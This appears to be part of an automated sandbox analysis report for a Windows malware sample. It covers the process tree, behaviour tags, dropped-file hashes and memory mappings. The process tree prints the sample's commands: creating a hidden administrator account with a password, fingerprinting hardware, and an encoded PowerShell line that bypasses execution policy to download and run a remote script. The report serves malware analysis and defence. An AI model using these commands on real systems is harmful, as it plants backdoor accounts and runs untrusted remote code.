C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc CMmJStNp1⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc CMmJStNp2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc CMmJStNp3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ustwo_20210607-133958.exe.logMD5
4a30a8132195c1aa1a62b78676b178d9
SHA1506e6d99a2ba08c9d3553af30daaaa0fc46ae4be
SHA25671636c227625058652c089035480b7bb3e5795f3998bc9823c401029fc844a20
SHA5123272b5129525c2b8f7efb99f5a2115cf2572480ff6938ca80e63f02c52588216f861307b9ef962ba015787cae0d5a95e74ebb5fe4b35b34f1c4f3a7deac8ce09
-
C:\Users\Admin\AppData\Local\Temp\RES6543.tmpMD5
b2a4a4cb161bec878cde5a991b7263e0
SHA11dfc5820859f0c0e75ea8892ad0722137cae0b6c
SHA25684d9ec8936f634bee82f8b22cde78a82de98a85b2cef6afcba0356100c52bf4c
SHA51202ee08d7eadffdf979a89700b31f7d50ae7f300a8c744fa6083f5a491b134d7b766fa6bb9085f7727500528298b16bec82157ad534b0313c9d92fe7c278be507
-
C:\Users\Admin\AppData\Local\Temp\filename.exeMD5
505588539c4e6b741da239143f0f37fb
SHA1ad48f0be39fff9408cf51f038289c9e39e6c774a
SHA25609ce67093a7bb080fab93aafce87ad6ba1c6afe168b1cf1e9a0fc7a0056ad599
SHA5120533288c77c8d63db8668621ba04786331d7e179609c5a5e2637541b54c7caf3fd117b694ab7ab42a07203272773d8be633c3fe89737b00d578c6d2fd6062eee
-
C:\Users\Admin\AppData\Local\Temp\filename.exeMD5
505588539c4e6b741da239143f0f37fb
SHA1ad48f0be39fff9408cf51f038289c9e39e6c774a
SHA25609ce67093a7bb080fab93aafce87ad6ba1c6afe168b1cf1e9a0fc7a0056ad599
SHA5120533288c77c8d63db8668621ba04786331d7e179609c5a5e2637541b54c7caf3fd117b694ab7ab42a07203272773d8be633c3fe89737b00d578c6d2fd6062eee
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
dd7b84038b6d2f08e9b16705e68f5164
SHA1624bbab0b9e3a5c2abb6bfcbc55f42cf82c02b51
SHA256019d890cab31b27de41fe758c79c10285ba1e185fcf46c55ad36c5b79178b1dd
SHA512ab12b887723b8d7cfab0b242c8b4217995d36669b373003d1c808bdde70b62388bcdf0d8a4b20b70ac33f3d296bab2e733aea96bb17d7b7b596aec1869b390eb
-
C:\Users\Admin\AppData\Local\Temp\s4uxyrte\s4uxyrte.dllMD5
1f27fd5c3d72d9d40fed79be734e6d0f
SHA1b657163c9983a3794b4ca3aa8a8b0598ab60b39d
SHA256b6d7ec0d0453f659427d49ce43f5e66ecfea532aa2ed5bd26b21121d5084fb27
SHA512869e5627594683931ab9a797099c07268baf4cd22a6455c6898b0ad5437411ff3bd1cb74bcce9ef477fed812983dd20c33c91029002725b5c833bd51a5fdd520
-
\??\c:\Users\Admin\AppData\Local\Temp\s4uxyrte\CSC940AA4FF2B0A4866A69C7916656BD38D.TMPMD5
3e88492ef6a2d06e174c74038b79f9c2
SHA1719409e27ec5ad1822b710262b26b98eb7a40e99
SHA256a5fd07a0a20d55993017792c4c7d28aad8365e10414559a926f6f5a544e2f848
SHA51289687b45ca5522a400ce3258e66366e7f8aaeb265851f0da44be4058743da879b5febd3475c640c2af695ecadb4702a616e2e292b85489f71e0bb2c3c4459a90
-
\??\c:\Users\Admin\AppData\Local\Temp\s4uxyrte\s4uxyrte.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\s4uxyrte\s4uxyrte.cmdlineMD5
f04a08ac2fa962afef12dfbcf0699c00
SHA1ad8fd1c08ac53b61fa4d3e725f8a88a302a8c5c3
SHA256e814943bc3f505ab6b3471947e6da398bcadc5ab6241ca3b7a1ab2cc5e5d5d3f
SHA512a71b7dbad6e456388ef263a674e41478556de72c33fff3e312faee078ca9aae202113d822f9ca57754b3b119ba3ec299625a0f887c71e8e58dfdb6f810371796
-
\Windows\Branding\mediasrv.pngMD5
e723ee58ac7eaa89545e826ded0d3784
SHA1e6b3e719cd9c577c6de8ca0e86dc178762e2166b
SHA2565c8730a1ca5d16938512fade07e410b883d34c8bf7449a7a8acf7772dd5f97f7
SHA512a3a0902293144c901ec8400de191296830a522230a530439c30d7969d1aef14000aace04d32734c5e7e1f64d0bf84a4eea70a0cc11ff525125975c174026ed60
-
\Windows\Branding\mediasvc.pngMD5
98131ba8b134e7e8b9c35874bb45416a
SHA1267181fabcedddcb52bd7ec2e8f097f841701e17
SHA2561b6065bb160f343804e8ec6d975946ccf06b792d68c04b8cb905714774af93cd
SHA5121276c9ac17e307371f0af7ce25022589ddf9da23e5b57ab9e7a75912cbdd38545c91ef0d9ee1fe706491ef6c0fcb4a6152dea4b0df2e8594ae253f23cb5198e0
-
memory/184-243-0x0000000000000000-mapping.dmp
-
memory/200-167-0x0000000000000000-mapping.dmp
-
memory/372-224-0x0000000000000000-mapping.dmp
-
memory/496-253-0x0000000000000000-mapping.dmp
-
memory/636-221-0x0000000000000000-mapping.dmp
-
memory/900-220-0x0000000000000000-mapping.dmp
-
memory/900-238-0x0000000000000000-mapping.dmp
-
memory/936-230-0x0000000000000000-mapping.dmp
-
memory/1304-246-0x0000000000000000-mapping.dmp
-
memory/1728-154-0x000001ECFCDD0000-0x000001ECFCDD1000-memory.dmpFilesize
4KB
-
memory/1728-182-0x000001ECFD600000-0x000001ECFD601000-memory.dmpFilesize
4KB
-
memory/1728-175-0x000001ECFCF20000-0x000001ECFCF21000-memory.dmpFilesize
4KB
-
memory/1728-183-0x000001ECFD990000-0x000001ECFD991000-memory.dmpFilesize
4KB
-
memory/1728-146-0x0000000000000000-mapping.dmp
-
memory/1728-151-0x000001ECE2590000-0x000001ECE2592000-memory.dmpFilesize
8KB
-
memory/1728-152-0x000001ECE2593000-0x000001ECE2595000-memory.dmpFilesize
8KB
-
memory/1728-197-0x000001ECE2598000-0x000001ECE2599000-memory.dmpFilesize
4KB
-
memory/1728-159-0x000001ECFCF80000-0x000001ECFCF81000-memory.dmpFilesize
4KB
-
memory/1728-170-0x000001ECE2596000-0x000001ECE2598000-memory.dmpFilesize
8KB
-
memory/1972-237-0x0000000000000000-mapping.dmp
-
memory/2232-233-0x0000000000000000-mapping.dmp
-
memory/2284-212-0x0000026271DC6000-0x0000026271DC8000-memory.dmpFilesize
8KB
-
memory/2284-207-0x0000000000000000-mapping.dmp
-
memory/2284-210-0x0000026271DC3000-0x0000026271DC5000-memory.dmpFilesize
8KB
-
memory/2284-209-0x0000026271DC0000-0x0000026271DC2000-memory.dmpFilesize
8KB
-
memory/2284-213-0x0000026271DC8000-0x0000026271DCA000-memory.dmpFilesize
8KB
-
memory/2296-223-0x0000000000000000-mapping.dmp
-
memory/2324-133-0x0000000005800000-0x0000000005801000-memory.dmpFilesize
4KB
-
memory/2324-123-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/2324-124-0x0000000000417D76-mapping.dmp
-
memory/2324-128-0x0000000005BE0000-0x0000000005BE1000-memory.dmpFilesize
4KB
-
memory/2324-129-0x00000000054F0000-0x00000000054F1000-memory.dmpFilesize
4KB
-
memory/2324-134-0x0000000006950000-0x0000000006951000-memory.dmpFilesize
4KB
-
memory/2324-130-0x0000000005550000-0x0000000005551000-memory.dmpFilesize
4KB
-
memory/2324-132-0x00000000055C0000-0x00000000055C1000-memory.dmpFilesize
4KB
-
memory/2324-131-0x00000000055D0000-0x00000000055D1000-memory.dmpFilesize
4KB
-
memory/2328-229-0x0000000000000000-mapping.dmp
-
memory/2408-222-0x0000000000000000-mapping.dmp
-
memory/2732-247-0x0000000000000000-mapping.dmp
-
memory/2772-245-0x0000000000000000-mapping.dmp
-
memory/2784-235-0x0000000000000000-mapping.dmp
-
memory/2884-217-0x00000168F9A68000-0x00000168F9A6A000-memory.dmpFilesize
8KB
-
memory/2884-216-0x00000168F9A66000-0x00000168F9A68000-memory.dmpFilesize
8KB
-
memory/2884-211-0x0000000000000000-mapping.dmp
-
memory/2884-214-0x00000168F9A60000-0x00000168F9A62000-memory.dmpFilesize
8KB
-
memory/2884-215-0x00000168F9A63000-0x00000168F9A65000-memory.dmpFilesize
8KB
-
memory/3052-234-0x0000000000000000-mapping.dmp
-
memory/3144-240-0x0000000000000000-mapping.dmp
-
memory/3144-225-0x0000000000000000-mapping.dmp
-
memory/3160-171-0x0000000000000000-mapping.dmp
-
memory/3172-252-0x0000000000000000-mapping.dmp
-
memory/3180-242-0x0000000000000000-mapping.dmp
-
memory/3184-239-0x0000000000000000-mapping.dmp
-
memory/3260-145-0x0000020C79726000-0x0000020C79727000-memory.dmpFilesize
4KB
-
memory/3260-137-0x0000000000000000-mapping.dmp
-
memory/3260-140-0x0000020C79B70000-0x0000020C79F91000-memory.dmpFilesize
4.1MB
-
memory/3260-143-0x0000020C79723000-0x0000020C79725000-memory.dmpFilesize
8KB
-
memory/3260-142-0x0000020C79720000-0x0000020C79722000-memory.dmpFilesize
8KB
-
memory/3260-144-0x0000020C79725000-0x0000020C79726000-memory.dmpFilesize
4KB
-
memory/3332-227-0x0000000000000000-mapping.dmp
-
memory/3392-226-0x0000000000000000-mapping.dmp
-
memory/3680-236-0x0000000000000000-mapping.dmp
-
memory/3888-218-0x0000000000000000-mapping.dmp
-
memory/3940-219-0x0000000000000000-mapping.dmp
-
memory/3984-228-0x0000000000000000-mapping.dmp
-
memory/3992-120-0x00000000051A0000-0x00000000051A1000-memory.dmpFilesize
4KB
-
memory/3992-117-0x0000000004E10000-0x0000000004E11000-memory.dmpFilesize
4KB
-
memory/3992-116-0x0000000005270000-0x0000000005271000-memory.dmpFilesize
4KB
-
memory/3992-122-0x0000000005180000-0x000000000518A000-memory.dmpFilesize
40KB
-
memory/3992-121-0x0000000005140000-0x0000000005141000-memory.dmpFilesize
4KB
-
memory/3992-114-0x0000000000540000-0x0000000000541000-memory.dmpFilesize
4KB
-
memory/3992-119-0x0000000004D70000-0x000000000526E000-memory.dmpFilesize
5.0MB
-
memory/3992-118-0x0000000004DA0000-0x0000000004DA1000-memory.dmpFilesize
4KB
-
memory/4016-190-0x0000000000000000-mapping.dmp
-
memory/4016-198-0x0000014C45520000-0x0000014C45522000-memory.dmpFilesize
8KB
-
memory/4016-199-0x0000014C45523000-0x0000014C45525000-memory.dmpFilesize
8KB
-
memory/4016-206-0x0000014C45526000-0x0000014C45528000-memory.dmpFilesize
8KB
-
memory/4016-208-0x0000014C45528000-0x0000014C4552A000-memory.dmpFilesize
8KB
-
memory/4048-244-0x0000000000000000-mapping.dmp
-
memory/4056-249-0x000001A729670000-0x000001A729672000-memory.dmpFilesize
8KB
-
memory/4056-250-0x000001A729673000-0x000001A729675000-memory.dmpFilesize
8KB
-
memory/4056-251-0x000001A729676000-0x000001A729678000-memory.dmpFilesize
8KB
-
memory/4056-248-0x0000000000000000-mapping.dmp
-
memory/4056-241-0x0000000000000000-mapping.dmp